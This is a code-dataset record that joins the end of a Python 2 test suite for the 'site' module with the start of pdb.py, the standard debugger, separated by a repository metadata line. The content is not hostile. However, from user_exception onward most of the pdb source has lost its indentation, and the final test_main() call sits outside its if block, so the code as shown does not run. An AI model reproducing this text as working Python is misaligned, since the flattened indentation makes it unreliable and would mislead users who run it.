        if original_dir == os.path.normcase(original_dir):
            self.assertEqual(abs_dir, norm_dir)
        else:
            self.assertEqual(os.path.normcase(abs_dir), norm_dir)

    def test_init_pathinfo(self):
        # Every existing directory on sys.path must appear (normalized)
        # in the set returned by site._init_pathinfo().
        dir_set = site._init_pathinfo()
        for entry in [site.makepath(path)[1] for path in sys.path
                      if path and os.path.isdir(path)]:
            self.assertIn(entry, dir_set,
                          "%s from sys.path not found in set returned "
                          "by _init_pathinfo(): %s" % (entry, dir_set))

    def pth_file_tests(self, pth_file):
        """Contain common code for testing results of reading a .pth file"""
        self.assertIn(pth_file.imported, sys.modules,
                      "%s not in sys.modules" % pth_file.imported)
        self.assertIn(site.makepath(pth_file.good_dir_path)[0], sys.path)
        self.assertFalse(os.path.exists(pth_file.bad_dir_path))

    def test_addpackage(self):
        # Make sure addpackage() imports if the line starts with 'import',
        # adds directories to sys.path for any line in the file that is not a
        # comment or import that is a valid directory name for where the .pth
        # file resides; invalid directories are not added
        pth_file = PthFile()
        pth_file.cleanup(prep=True) # to make sure that nothing is
        # pre-existing that shouldn't be
        try:
            pth_file.create()
            site.addpackage(pth_file.base_dir, pth_file.filename, set())
            self.pth_file_tests(pth_file)
        finally:
            pth_file.cleanup()

    def make_pth(self, contents, pth_dir='.', pth_name=TESTFN):
        # Create a .pth file and return its (abspath, basename).
        pth_dir = os.path.abspath(pth_dir)
        pth_basename = pth_name + '.pth'
        pth_fn = os.path.join(pth_dir, pth_basename)
        pth_file = open(pth_fn, 'w')
        self.addCleanup(lambda: os.remove(pth_fn))
        pth_file.write(contents)
        pth_file.close()
        return pth_dir, pth_basename

    def test_addpackage_import_bad_syntax(self):
        # Issue 10642: a syntax error in a .pth 'import' line must be
        # reported on stderr, not crash interpreter startup.
        pth_dir, pth_fn = self.make_pth("import bad)syntax\n")
        with captured_output("stderr") as err_out:
            site.addpackage(pth_dir, pth_fn, set())
        self.assertRegexpMatches(err_out.getvalue(), "line 1")
        self.assertRegexpMatches(err_out.getvalue(),
            re.escape(os.path.join(pth_dir, pth_fn)))
        # XXX: the previous two should be independent checks so that the
        # order doesn't matter. The next three could be a single check
        # but my regex foo isn't good enough to write it.
        self.assertRegexpMatches(err_out.getvalue(), 'Traceback')
        self.assertRegexpMatches(err_out.getvalue(), r'import bad\)syntax')
        self.assertRegexpMatches(err_out.getvalue(), 'SyntaxError')

    def test_addpackage_import_bad_exec(self):
        # Issue 10642
        pth_dir, pth_fn = self.make_pth("randompath\nimport nosuchmodule\n")
        with captured_output("stderr") as err_out:
            site.addpackage(pth_dir, pth_fn, set())
        self.assertRegexpMatches(err_out.getvalue(), "line 2")
        self.assertRegexpMatches(err_out.getvalue(),
            re.escape(os.path.join(pth_dir, pth_fn)))
        # XXX: ditto previous XXX comment.
        self.assertRegexpMatches(err_out.getvalue(), 'Traceback')
        self.assertRegexpMatches(err_out.getvalue(), 'ImportError')

    @unittest.skipIf(is_jython, "FIXME: not on Jython yet.")
    @unittest.skipIf(sys.platform == "win32", "Windows does not raise an "
                     "error for file paths containing null characters")
    def test_addpackage_import_bad_pth_file(self):
        # Issue 5258
        pth_dir, pth_fn = self.make_pth("abc\x00def\n")
        with captured_output("stderr") as err_out:
            site.addpackage(pth_dir, pth_fn, set())
        self.assertRegexpMatches(err_out.getvalue(), "line 1")
        self.assertRegexpMatches(err_out.getvalue(),
            re.escape(os.path.join(pth_dir, pth_fn)))
        # XXX: ditto previous XXX comment.
        self.assertRegexpMatches(err_out.getvalue(), 'Traceback')
        self.assertRegexpMatches(err_out.getvalue(), 'TypeError')

    def test_addsitedir(self):
        # Same tests for test_addpackage since addsitedir() essentially just
        # calls addpackage() for every .pth file in the directory
        pth_file = PthFile()
        pth_file.cleanup(prep=True) # Make sure that nothing is pre-existing
        # that is tested for
        try:
            pth_file.create()
            site.addsitedir(pth_file.base_dir, set())
            self.pth_file_tests(pth_file)
        finally:
            pth_file.cleanup()

    @unittest.skipIf(is_jython, "FIXME: not on Jython yet.")
    @unittest.skipUnless(site.ENABLE_USER_SITE, "requires access to PEP 370 "
                         "user-site (site.ENABLE_USER_SITE)")
    def test_s_option(self):
        # The user site dir must be on sys.path normally, absent with -s
        # or PYTHONNOUSERSITE, and relocatable via PYTHONUSERBASE.
        usersite = site.USER_SITE
        self.assertIn(usersite, sys.path)

        env = os.environ.copy()
        rc = subprocess.call([sys.executable, '-c',
            'import sys; sys.exit(%r in sys.path)' % usersite],
            env=env)
        self.assertEqual(rc, 1, "%r is not in sys.path (sys.exit returned %r)"
                % (usersite, rc))

        env = os.environ.copy()
        rc = subprocess.call([sys.executable, '-s', '-c',
            'import sys; sys.exit(%r in sys.path)' % usersite],
            env=env)
        self.assertEqual(rc, 0)

        env = os.environ.copy()
        env["PYTHONNOUSERSITE"] = "1"
        rc = subprocess.call([sys.executable, '-c',
            'import sys; sys.exit(%r in sys.path)' % usersite],
            env=env)
        self.assertEqual(rc, 0)

        env = os.environ.copy()
        env["PYTHONUSERBASE"] = "/tmp"
        rc = subprocess.call([sys.executable, '-c',
            'import sys, site; sys.exit(site.USER_BASE.startswith("/tmp"))'],
            env=env)
        self.assertEqual(rc, 1)

    @unittest.skipIf(is_jython, "FIXME: not on Jython yet.")
    def test_getuserbase(self):
        site.USER_BASE = None
        user_base = site.getuserbase()
        # the call sets site.USER_BASE
        self.assertEqual(site.USER_BASE, user_base)

        # let's set PYTHONUSERBASE and see if it uses it
        site.USER_BASE = None
        import sysconfig
        sysconfig._CONFIG_VARS = None
        with EnvironmentVarGuard() as environ:
            environ['PYTHONUSERBASE'] = 'xoxo'
            self.assertTrue(site.getuserbase().startswith('xoxo'),
                            site.getuserbase())

    def test_getusersitepackages(self):
        site.USER_SITE = None
        site.USER_BASE = None
        user_site = site.getusersitepackages()
        # the call sets USER_BASE *and* USER_SITE
        self.assertEqual(site.USER_SITE, user_site)
        self.assertTrue(user_site.startswith(site.USER_BASE), user_site)

    def test_getsitepackages(self):
        # getsitepackages() derives its directories from site.PREFIXES;
        # the expected layout differs per platform.
        site.PREFIXES = ['xoxo']
        dirs = site.getsitepackages()

        if sys.platform in ('os2emx', 'riscos') or is_jython:
            self.assertEqual(len(dirs), 1)
            wanted = os.path.join('xoxo', 'Lib', 'site-packages')
            self.assertEqual(dirs[0], wanted)
        elif (sys.platform == "darwin" and
              sysconfig.get_config_var("PYTHONFRAMEWORK")):
            # OS X framework builds
            site.PREFIXES = ['Python.framework']
            dirs = site.getsitepackages()
            self.assertEqual(len(dirs), 3)
            wanted = os.path.join('/Library',
                                  sysconfig.get_config_var("PYTHONFRAMEWORK"),
                                  sys.version[:3],
                                  'site-packages')
            self.assertEqual(dirs[2], wanted)
        elif os.sep == '/':
            # OS X non-framwework builds, Linux, FreeBSD, etc
            self.assertEqual(len(dirs), 2)
            wanted = os.path.join('xoxo', 'lib', 'python' + sys.version[:3],
                                  'site-packages')
            self.assertEqual(dirs[0], wanted)
            wanted = os.path.join('xoxo', 'lib', 'site-python')
            self.assertEqual(dirs[1], wanted)
        else:
            # other platforms
            self.assertEqual(len(dirs), 2)
            self.assertEqual(dirs[0], 'xoxo')
            wanted = os.path.join('xoxo', 'lib', 'site-packages')
            self.assertEqual(dirs[1], wanted)
class PthFile(object):
    """Helper class for handling testing of .pth files"""

    def __init__(self, filename_base=TESTFN, imported="time",
                 good_dirname="__testdir__", bad_dirname="__bad"):
        """Initialize instance variables"""
        self.filename = filename_base + ".pth"
        self.base_dir = os.path.abspath('')
        self.file_path = os.path.join(self.base_dir, self.filename)
        self.imported = imported
        self.good_dirname = good_dirname
        self.bad_dirname = bad_dirname
        self.good_dir_path = os.path.join(self.base_dir, self.good_dirname)
        self.bad_dir_path = os.path.join(self.base_dir, self.bad_dirname)

    def create(self):
        """Create a .pth file with a comment, blank lines, an ``import
        <self.imported>``, a line with self.good_dirname, and a line with
        self.bad_dirname.

        Creation of the directory for self.good_dir_path (based off of
        self.good_dirname) is also performed.

        Make sure to call self.cleanup() to undo anything done by this method.
        """
        FILE = open(self.file_path, 'w')
        try:
            print>>FILE, "#import @bad module name"
            print>>FILE, "\n"
            print>>FILE, "import %s" % self.imported
            print>>FILE, self.good_dirname
            print>>FILE, self.bad_dirname
        finally:
            FILE.close()
        os.mkdir(self.good_dir_path)

    def cleanup(self, prep=False):
        """Make sure that the .pth file is deleted, self.imported is not in
        sys.modules, and that both self.good_dirname and self.bad_dirname are
        not existing directories."""
        if os.path.exists(self.file_path):
            os.remove(self.file_path)
        if prep:
            # Remember (and unload) any already-imported module so a later
            # cleanup(prep=False) can restore it.
            self.imported_module = sys.modules.get(self.imported)
            if self.imported_module:
                del sys.modules[self.imported]
        else:
            # NOTE(review): self.imported_module only exists if
            # cleanup(prep=True) ran earlier -- calling cleanup() without a
            # prior prep pass would raise AttributeError here; confirm usage.
            if self.imported_module:
                sys.modules[self.imported] = self.imported_module
        if os.path.exists(self.good_dir_path):
            os.rmdir(self.good_dir_path)
        if os.path.exists(self.bad_dir_path):
            os.rmdir(self.bad_dir_path)
class ImportSideEffectTests(unittest.TestCase):
    """Test side-effects from importing 'site'."""

    def setUp(self):
        """Make a copy of sys.path"""
        self.sys_path = sys.path[:]

    def tearDown(self):
        """Restore sys.path"""
        sys.path[:] = self.sys_path

    def test_abs__file__(self):
        # Make sure all imported modules have their __file__ attribute
        # as an absolute path.
        # Handled by abs__file__()
        site.abs__file__()
        for module in (sys, os, __builtin__):
            try:
                self.assertTrue(os.path.isabs(module.__file__), repr(module))
            except AttributeError:
                continue
        # We could try everything in sys.modules; however, when regrtest.py
        # runs something like test_frozen before test_site, then we will
        # be testing things loaded *after* test_site did path normalization

    def test_no_duplicate_paths(self):
        # No duplicate paths should exist in sys.path
        # Handled by removeduppaths()
        site.removeduppaths()
        seen_paths = set()
        for path in sys.path:
            self.assertNotIn(path, seen_paths)
            seen_paths.add(path)

    def test_add_build_dir(self):
        # Test that the build directory's Modules directory is used when it
        # should be.
        # XXX: implement
        pass

    def test_setting_quit(self):
        # 'quit' and 'exit' should be injected into __builtin__
        self.assertTrue(hasattr(__builtin__, "quit"))
        self.assertTrue(hasattr(__builtin__, "exit"))

    def test_setting_copyright(self):
        # 'copyright' and 'credits' should be in __builtin__
        self.assertTrue(hasattr(__builtin__, "copyright"))
        self.assertTrue(hasattr(__builtin__, "credits"))

    def test_setting_help(self):
        # 'help' should be set in __builtin__
        self.assertTrue(hasattr(__builtin__, "help"))

    def test_aliasing_mbcs(self):
        # On Windows code-page locales, some encoding must alias to "mbcs".
        if sys.platform == "win32":
            import locale
            if locale.getdefaultlocale()[1].startswith('cp'):
                for value in encodings.aliases.aliases.itervalues():
                    if value == "mbcs":
                        break
                else:
                    self.fail("did not alias mbcs")

    def test_setdefaultencoding_removed(self):
        # Make sure sys.setdefaultencoding is gone
        self.assertTrue(not hasattr(sys, "setdefaultencoding"))

    def test_sitecustomize_executed(self):
        # If sitecustomize is available, it should have been imported.
        if "sitecustomize" not in sys.modules:
            try:
                import sitecustomize
            except ImportError:
                pass
            else:
                self.fail("sitecustomize not imported automatically")
def test_main():
    """Entry point for regrtest: run both test classes of this module."""
    run_unittest(HelperFunctionsTests, ImportSideEffectTests)
if __name__ == "__main__":
test_main()
| epl-1.0 |
xyzz/vcmi-build | project/jni/python/src/Lib/pdb.py | 51 | 44829 | #! /usr/bin/env python
"""A Python debugger."""
# (See pdb.doc for documentation.)
import sys
import linecache
import cmd
import bdb
from repr import Repr
import os
import re
import pprint
import traceback
class Restart(Exception):
    """Causes a debugger to be restarted for the debugged python program.

    Raised by the 'run'/'restart' command and caught by the driver loop in
    main(), which then re-runs the script under the same Pdb instance.
    """
    pass
# Create a custom safe Repr instance and increase its maxstring.
# The default of 30 truncates error messages too easily.
_repr = Repr()
_repr.maxstring = 200
_saferepr = _repr.repr
__all__ = ["run", "pm", "Pdb", "runeval", "runctx", "runcall", "set_trace",
"post_mortem", "help"]
def find_function(funcname, filename):
    """Scan *filename* for the first line that textually defines *funcname*.

    Returns a (funcname, filename, lineno) tuple -- lineno is 1-based -- or
    None if the file cannot be opened or no matching line is found.  Only a
    'def name(' at the very start of a line matches (re.match anchors at
    column 0), so indented/nested definitions are never found.
    """
    cre = re.compile(r'def\s+%s\s*[(]' % re.escape(funcname))
    try:
        fp = open(filename)
    except IOError:
        return None
    try:
        # consumer of this info expects the first line to be 1
        lineno = 1
        for line in fp:
            if cre.match(line):
                return funcname, filename, lineno
            lineno = lineno + 1
    finally:
        # Close on every path; the original leaked the handle if an
        # exception escaped the read loop.
        fp.close()
    return None
# Interaction prompt line will separate file and call info from code
# text using value of line_prefix string. A newline and arrow may
# be to your liking. You can set it once pdb is imported using the
# command "pdb.line_prefix = '\n% '".
# line_prefix = ': ' # Use this to get the old situation back
line_prefix = '\n-> ' # Probably a better default
class Pdb(bdb.Bdb, cmd.Cmd):
    def __init__(self, completekey='tab', stdin=None, stdout=None):
        """Initialise both base classes and load .pdbrc startup commands.

        completekey -- readline completion key passed to cmd.Cmd.
        stdin/stdout -- optional replacement streams; passing stdout
        disables raw_input so all I/O goes through the given streams.
        """
        bdb.Bdb.__init__(self)
        cmd.Cmd.__init__(self, completekey, stdin, stdout)
        if stdout:
            self.use_rawinput = 0
        self.prompt = '(Pdb) '
        self.aliases = {}
        self.mainpyfile = ''
        self._wait_for_mainpyfile = 0
        # Try to load readline if it exists
        try:
            import readline
        except ImportError:
            pass
        # Read $HOME/.pdbrc and ./.pdbrc; lines are stored (not executed)
        # until execRcLines() runs on the first setup().
        self.rcLines = []
        if 'HOME' in os.environ:
            envHome = os.environ['HOME']
            try:
                rcFile = open(os.path.join(envHome, ".pdbrc"))
            except IOError:
                pass
            else:
                for line in rcFile.readlines():
                    self.rcLines.append(line)
                rcFile.close()
        try:
            rcFile = open(".pdbrc")
        except IOError:
            pass
        else:
            for line in rcFile.readlines():
                self.rcLines.append(line)
            rcFile.close()
        # State for the 'commands' feature (per-breakpoint command lists).
        self.commands = {} # associates a command list to breakpoint numbers
        self.commands_doprompt = {} # for each bp num, tells if the prompt must be disp. after execing the cmd list
        self.commands_silent = {} # for each bp num, tells if the stack trace must be disp. after execing the cmd list
        self.commands_defining = False # True while in the process of defining a command list
        self.commands_bnum = None # The breakpoint number for which we are defining a list
    def reset(self):
        """Reset bdb tracing state and drop the cached frame stack."""
        bdb.Bdb.reset(self)
        self.forget()
    def forget(self):
        """Drop all references to the frame stack being examined."""
        self.lineno = None      # last line shown by do_list ('list' continuation)
        self.stack = []         # list of (frame, lineno) pairs from get_stack()
        self.curindex = 0       # index of the current frame within self.stack
        self.curframe = None    # the frame object commands operate on
    def setup(self, f, t):
        """Build the frame stack for frame *f* / traceback *t* and make the
        innermost frame current; then run any pending .pdbrc lines."""
        self.forget()
        self.stack, self.curindex = self.get_stack(f, t)
        self.curframe = self.stack[self.curindex][0]
        self.execRcLines()
# Can be executed earlier than 'setup' if desired
    def execRcLines(self):
        """Execute the stored .pdbrc lines (at most once per instance)."""
        if self.rcLines:
            # Make local copy because of recursion
            rcLines = self.rcLines
            # executed only once: clear before executing so a command that
            # re-enters here does not replay the same lines.
            self.rcLines = []
            for line in rcLines:
                # Strip the trailing newline kept by readlines().
                line = line[:-1]
                if len(line) > 0 and line[0] != '#':
                    self.onecmd(line)
# Override Bdb methods
    def user_call(self, frame, argument_list):
        """This method is called when there is the remote possibility
        that we ever need to stop in this function."""
        # While still skipping pdb's own startup frames (before the main
        # script is reached), never stop.
        if self._wait_for_mainpyfile:
            return
        if self.stop_here(frame):
            print >>self.stdout, '--Call--'
            self.interaction(frame, None)
    def user_line(self, frame):
        """This function is called when we stop or break at this line."""
        if self._wait_for_mainpyfile:
            # Ignore events until execution reaches the main script itself
            # (frames with lineno <= 0 or other files are pdb's own setup).
            if (self.mainpyfile != self.canonic(frame.f_code.co_filename)
                or frame.f_lineno<= 0):
                return
            self._wait_for_mainpyfile = 0
        # bp_commands() returns a true value when the normal interactive
        # prompt should still be entered after running breakpoint commands.
        if self.bp_commands(frame):
            self.interaction(frame, None)
    def bp_commands(self,frame):
        """ Call every command that was set for the current active breakpoint (if there is one)
        Returns True if the normal interaction function must be called, False otherwise """
        #self.currentbp is set in bdb.py in bdb.break_here if a breakpoint was hit
        if getattr(self,"currentbp",False) and self.currentbp in self.commands:
            currentbp = self.currentbp
            # Clear it first so recursive stops don't replay the same list.
            self.currentbp = 0
            lastcmd_back = self.lastcmd
            self.setup(frame, None)
            for line in self.commands[currentbp]:
                self.onecmd(line)
            # onecmd() clobbers lastcmd; restore the user's history.
            self.lastcmd = lastcmd_back
            if not self.commands_silent[currentbp]:
                self.print_stack_entry(self.stack[self.curindex])
            if self.commands_doprompt[currentbp]:
                # A resuming command was not in the list: drop to the prompt.
                self.cmdloop()
            self.forget()
            # Falsy: interaction() was already handled here.
            return
        return 1
    def user_return(self, frame, return_value):
        """This function is called when a return trap is set here."""
        # Expose the value to the user as the magic local '__return__'
        # (printed by the 'retval' command).
        frame.f_locals['__return__'] = return_value
        print >>self.stdout, '--Return--'
        self.interaction(frame, None)
def user_exception(self, frame, exc_info):
exc_type, exc_value, exc_traceback = exc_info
"""This function is called if an exception occurs,
but only if we are to stop at or just below this level."""
frame.f_locals['__exception__'] = exc_type, exc_value
if type(exc_type) == type(''):
exc_type_name = exc_type
else: exc_type_name = exc_type.__name__
print >>self.stdout, exc_type_name + ':', _saferepr(exc_value)
self.interaction(frame, exc_traceback)
# General interaction function
    def interaction(self, frame, traceback):
        """Enter the interactive command loop for *frame*/*traceback*, then
        release all frame references when the user resumes execution."""
        self.setup(frame, traceback)
        self.print_stack_entry(self.stack[self.curindex])
        self.cmdloop()
        self.forget()
def displayhook(self, obj):
"""Custom displayhook for the exec in default(), which prevents
assignment of the _ variable in the builtins.
"""
print repr(obj)
    def default(self, line):
        """Execute *line* as a Python statement in the current frame.

        Reached for any input that is not a recognised debugger command;
        a leading '!' explicitly forces this path and is stripped.
        """
        if line[:1] == '!': line = line[1:]
        locals = self.curframe.f_locals
        globals = self.curframe.f_globals
        try:
            code = compile(line + '\n', '<stdin>', 'single')
            # Temporarily point the std streams and displayhook at the
            # debugger's own, so output from the user's statement appears
            # at the (Pdb) prompt even when streams were replaced.
            save_stdout = sys.stdout
            save_stdin = sys.stdin
            save_displayhook = sys.displayhook
            try:
                sys.stdin = self.stdin
                sys.stdout = self.stdout
                sys.displayhook = self.displayhook
                exec code in globals, locals
            finally:
                sys.stdout = save_stdout
                sys.stdin = save_stdin
                sys.displayhook = save_displayhook
        except:
            # Report any error from the user's code; never let it kill pdb.
            t, v = sys.exc_info()[:2]
            if type(t) == type(''):
                exc_type_name = t
            else: exc_type_name = t.__name__
            print >>self.stdout, '***', exc_type_name + ':', v
    def precmd(self, line):
        """Handle alias expansion and ';;' separator."""
        if not line.strip():
            return line
        args = line.split()
        # Expand aliases repeatedly, so aliases may be defined in terms of
        # other aliases.  %1..%n are positional parameters, %* is all of them.
        while args[0] in self.aliases:
            line = self.aliases[args[0]]
            ii = 1
            for tmpArg in args[1:]:
                line = line.replace("%" + str(ii),
                                      tmpArg)
                ii = ii + 1
            line = line.replace("%*", ' '.join(args[1:]))
            args = line.split()
        # split into ';;' separated commands
        # unless it's an alias command
        if args[0] != 'alias':
            marker = line.find(';;')
            if marker >= 0:
                # queue up everything after marker
                next = line[marker+2:].lstrip()
                self.cmdqueue.append(next)
                line = line[:marker].rstrip()
        return line
def onecmd(self, line):
"""Interpret the argument as though it had been typed in response
to the prompt.
Checks whether this line is typed at the normal prompt or in
a breakpoint command list definition.
"""
if not self.commands_defining:
return cmd.Cmd.onecmd(self, line)
else:
return self.handle_command_def(line)
    def handle_command_def(self,line):
        """ Handles one command line during command list definition. """
        # NOTE: the local 'cmd' shadows the imported cmd module inside
        # this method.
        cmd, arg, line = self.parseline(line)
        if cmd == 'silent':
            self.commands_silent[self.commands_bnum] = True
            return # continue to handle other cmd def in the cmd list
        elif cmd == 'end':
            self.cmdqueue = []
            return 1 # end of cmd list
        cmdlist = self.commands[self.commands_bnum]
        if (arg):
            cmdlist.append(cmd+' '+arg)
        else:
            cmdlist.append(cmd)
        # Determine if we must stop
        try:
            func = getattr(self, 'do_' + cmd)
        except AttributeError:
            func = self.default
        # A resuming command implicitly terminates the list (see
        # help_commands for the rationale) and suppresses the prompt.
        if func.func_name in self.commands_resuming : # one of the resuming commands.
            self.commands_doprompt[self.commands_bnum] = False
            self.cmdqueue = []
            return 1
        return
# Command definitions, called by cmdloop()
# The argument is the remaining string on the command line
# Return true to exit from the command loop
do_h = cmd.Cmd.do_help
def do_commands(self, arg):
"""Defines a list of commands associated to a breakpoint
Those commands will be executed whenever the breakpoint causes the program to stop execution."""
if not arg:
bnum = len(bdb.Breakpoint.bpbynumber)-1
else:
try:
bnum = int(arg)
except:
print >>self.stdout, "Usage : commands [bnum]\n ...\n end"
return
self.commands_bnum = bnum
self.commands[bnum] = []
self.commands_doprompt[bnum] = True
self.commands_silent[bnum] = False
prompt_back = self.prompt
self.prompt = '(com) '
self.commands_defining = True
self.cmdloop()
self.commands_defining = False
self.prompt = prompt_back
def do_break(self, arg, temporary = 0):
# break [ ([filename:]lineno | function) [, "condition"] ]
if not arg:
if self.breaks: # There's at least one
print >>self.stdout, "Num Type Disp Enb Where"
for bp in bdb.Breakpoint.bpbynumber:
if bp:
bp.bpprint(self.stdout)
return
# parse arguments; comma has lowest precedence
# and cannot occur in filename
filename = None
lineno = None
cond = None
comma = arg.find(',')
if comma > 0:
# parse stuff after comma: "condition"
cond = arg[comma+1:].lstrip()
arg = arg[:comma].rstrip()
# parse stuff before comma: [filename:]lineno | function
colon = arg.rfind(':')
funcname = None
if colon >= 0:
filename = arg[:colon].rstrip()
f = self.lookupmodule(filename)
if not f:
print >>self.stdout, '*** ', repr(filename),
print >>self.stdout, 'not found from sys.path'
return
else:
filename = f
arg = arg[colon+1:].lstrip()
try:
lineno = int(arg)
except ValueError, msg:
print >>self.stdout, '*** Bad lineno:', arg
return
else:
# no colon; can be lineno or function
try:
lineno = int(arg)
except ValueError:
try:
func = eval(arg,
self.curframe.f_globals,
self.curframe.f_locals)
except:
func = arg
try:
if hasattr(func, 'im_func'):
func = func.im_func
code = func.func_code
#use co_name to identify the bkpt (function names
#could be aliased, but co_name is invariant)
funcname = code.co_name
lineno = code.co_firstlineno
filename = code.co_filename
except:
# last thing to try
(ok, filename, ln) = self.lineinfo(arg)
if not ok:
print >>self.stdout, '*** The specified object',
print >>self.stdout, repr(arg),
print >>self.stdout, 'is not a function'
print >>self.stdout, 'or was not found along sys.path.'
return
funcname = ok # ok contains a function name
lineno = int(ln)
if not filename:
filename = self.defaultFile()
# Check for reasonable breakpoint
line = self.checkline(filename, lineno)
if line:
# now set the break point
err = self.set_break(filename, line, temporary, cond, funcname)
if err: print >>self.stdout, '***', err
else:
bp = self.get_breaks(filename, line)[-1]
print >>self.stdout, "Breakpoint %d at %s:%d" % (bp.number,
bp.file,
bp.line)
# To be overridden in derived debuggers
def defaultFile(self):
"""Produce a reasonable default."""
filename = self.curframe.f_code.co_filename
if filename == '<string>' and self.mainpyfile:
filename = self.mainpyfile
return filename
do_b = do_break
def do_tbreak(self, arg):
self.do_break(arg, 1)
def lineinfo(self, identifier):
failed = (None, None, None)
# Input is identifier, may be in single quotes
idstring = identifier.split("'")
if len(idstring) == 1:
# not in single quotes
id = idstring[0].strip()
elif len(idstring) == 3:
# quoted
id = idstring[1].strip()
else:
return failed
if id == '': return failed
parts = id.split('.')
# Protection for derived debuggers
if parts[0] == 'self':
del parts[0]
if len(parts) == 0:
return failed
# Best first guess at file to look at
fname = self.defaultFile()
if len(parts) == 1:
item = parts[0]
else:
# More than one part.
# First is module, second is method/class
f = self.lookupmodule(parts[0])
if f:
fname = f
item = parts[1]
answer = find_function(item, fname)
return answer or failed
    def checkline(self, filename, lineno):
        """Check whether specified line seems to be executable.

        Return `lineno` if it is, 0 if not (e.g. a docstring, comment, blank
        line or EOF). Warning: testing is not comprehensive.
        """
        # curframe.f_globals lets linecache resolve loader-provided sources.
        line = linecache.getline(filename, lineno, self.curframe.f_globals)
        if not line:
            print >>self.stdout, 'End of file'
            return 0
        line = line.strip()
        # Don't allow setting breakpoint at a blank line
        if (not line or (line[0] == '#') or
             (line[:3] == '"""') or line[:3] == "'''"):
            print >>self.stdout, '*** Blank or comment'
            return 0
        return lineno
def do_enable(self, arg):
args = arg.split()
for i in args:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.enable()
def do_disable(self, arg):
args = arg.split()
for i in args:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.disable()
def do_condition(self, arg):
# arg is breakpoint number and condition
args = arg.split(' ', 1)
try:
bpnum = int(args[0].strip())
except ValueError:
# something went wrong
print >>self.stdout, \
'Breakpoint index %r is not a number' % args[0]
return
try:
cond = args[1]
except:
cond = None
try:
bp = bdb.Breakpoint.bpbynumber[bpnum]
except IndexError:
print >>self.stdout, 'Breakpoint index %r is not valid' % args[0]
return
if bp:
bp.cond = cond
if not cond:
print >>self.stdout, 'Breakpoint', bpnum,
print >>self.stdout, 'is now unconditional.'
def do_ignore(self,arg):
"""arg is bp number followed by ignore count."""
args = arg.split()
try:
bpnum = int(args[0].strip())
except ValueError:
# something went wrong
print >>self.stdout, \
'Breakpoint index %r is not a number' % args[0]
return
try:
count = int(args[1].strip())
except:
count = 0
try:
bp = bdb.Breakpoint.bpbynumber[bpnum]
except IndexError:
print >>self.stdout, 'Breakpoint index %r is not valid' % args[0]
return
if bp:
bp.ignore = count
if count > 0:
reply = 'Will ignore next '
if count > 1:
reply = reply + '%d crossings' % count
else:
reply = reply + '1 crossing'
print >>self.stdout, reply + ' of breakpoint %d.' % bpnum
else:
print >>self.stdout, 'Will stop next time breakpoint',
print >>self.stdout, bpnum, 'is reached.'
def do_clear(self, arg):
"""Three possibilities, tried in this order:
clear -> clear all breaks, ask for confirmation
clear file:lineno -> clear all breaks at file:lineno
clear bpno bpno ... -> clear breakpoints by number"""
if not arg:
try:
reply = raw_input('Clear all breaks? ')
except EOFError:
reply = 'no'
reply = reply.strip().lower()
if reply in ('y', 'yes'):
self.clear_all_breaks()
return
if ':' in arg:
# Make sure it works for "clear C:\foo\bar.py:12"
i = arg.rfind(':')
filename = arg[:i]
arg = arg[i+1:]
try:
lineno = int(arg)
except ValueError:
err = "Invalid line number (%s)" % arg
else:
err = self.clear_break(filename, lineno)
if err: print >>self.stdout, '***', err
return
numberlist = arg.split()
for i in numberlist:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
err = self.clear_bpbynumber(i)
if err:
print >>self.stdout, '***', err
else:
print >>self.stdout, 'Deleted breakpoint', i
do_cl = do_clear # 'c' is already an abbreviation for 'continue'
def do_where(self, arg):
self.print_stack_trace()
do_w = do_where
do_bt = do_where
def do_up(self, arg):
if self.curindex == 0:
print >>self.stdout, '*** Oldest frame'
else:
self.curindex = self.curindex - 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
do_u = do_up
def do_down(self, arg):
if self.curindex + 1 == len(self.stack):
print >>self.stdout, '*** Newest frame'
else:
self.curindex = self.curindex + 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
do_d = do_down
def do_until(self, arg):
self.set_until(self.curframe)
return 1
do_unt = do_until
def do_step(self, arg):
self.set_step()
return 1
do_s = do_step
def do_next(self, arg):
self.set_next(self.curframe)
return 1
do_n = do_next
def do_run(self, arg):
"""Restart program by raising an exception to be caught in the main debugger
loop. If arguments were given, set them in sys.argv."""
if arg:
import shlex
argv0 = sys.argv[0:1]
sys.argv = shlex.split(arg)
sys.argv[:0] = argv0
raise Restart
do_restart = do_run
def do_return(self, arg):
self.set_return(self.curframe)
return 1
do_r = do_return
def do_continue(self, arg):
self.set_continue()
return 1
do_c = do_cont = do_continue
def do_jump(self, arg):
if self.curindex + 1 != len(self.stack):
print >>self.stdout, "*** You can only jump within the bottom frame"
return
try:
arg = int(arg)
except ValueError:
print >>self.stdout, "*** The 'jump' command requires a line number."
else:
try:
# Do the jump, fix up our copy of the stack, and display the
# new position
self.curframe.f_lineno = arg
self.stack[self.curindex] = self.stack[self.curindex][0], arg
self.print_stack_entry(self.stack[self.curindex])
except ValueError, e:
print >>self.stdout, '*** Jump failed:', e
do_j = do_jump
def do_debug(self, arg):
sys.settrace(None)
globals = self.curframe.f_globals
locals = self.curframe.f_locals
p = Pdb(self.completekey, self.stdin, self.stdout)
p.prompt = "(%s) " % self.prompt.strip()
print >>self.stdout, "ENTERING RECURSIVE DEBUGGER"
sys.call_tracing(p.run, (arg, globals, locals))
print >>self.stdout, "LEAVING RECURSIVE DEBUGGER"
sys.settrace(self.trace_dispatch)
self.lastcmd = p.lastcmd
def do_quit(self, arg):
self._user_requested_quit = 1
self.set_quit()
return 1
do_q = do_quit
do_exit = do_quit
def do_EOF(self, arg):
print >>self.stdout
self._user_requested_quit = 1
self.set_quit()
return 1
def do_args(self, arg):
f = self.curframe
co = f.f_code
dict = f.f_locals
n = co.co_argcount
